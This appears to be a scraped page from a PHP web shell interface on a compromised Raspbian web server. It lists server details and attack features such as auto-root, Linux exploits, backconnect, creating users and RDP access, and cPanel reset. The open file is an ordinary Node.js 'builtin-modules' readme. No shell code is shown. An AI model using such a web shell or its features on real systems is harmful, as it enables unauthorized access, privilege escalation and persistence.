Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
node-builtin-modules /
[ HOME SHELL ]
Name
Size
Permission
Action
changelog.Debian.gz
484
B
-rw-r--r--
copyright
1.5
KB
-rw-r--r--
readme.md
954
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme.md
# builtin-modules [](https://travis-ci.org/sindresorhus/builtin-modules) > List of the Node.js builtin modules The list is just a [JSON file](builtin-modules.json) and can be used wherever. ## Install ``` $ npm install builtin-modules ``` ## Usage ```js const builtinModules = require('builtin-modules'); console.log(builtinModules); //=> ['assert', 'buffer', ...] ``` ## API Returns an array of builtin modules fetched from the running Node.js version. ### Static list This module also comes bundled with a static array of builtin modules generated from the latest Node.js version. You can get it with `require('builtin-modules/static');` ## Related - [is-builtin-module](https://github.com/sindresorhus/is-builtin-module) - Check if a string matches the name of a Node.js builtin module ## License MIT © [Sindre Sorhus](https://sindresorhus.com)
Close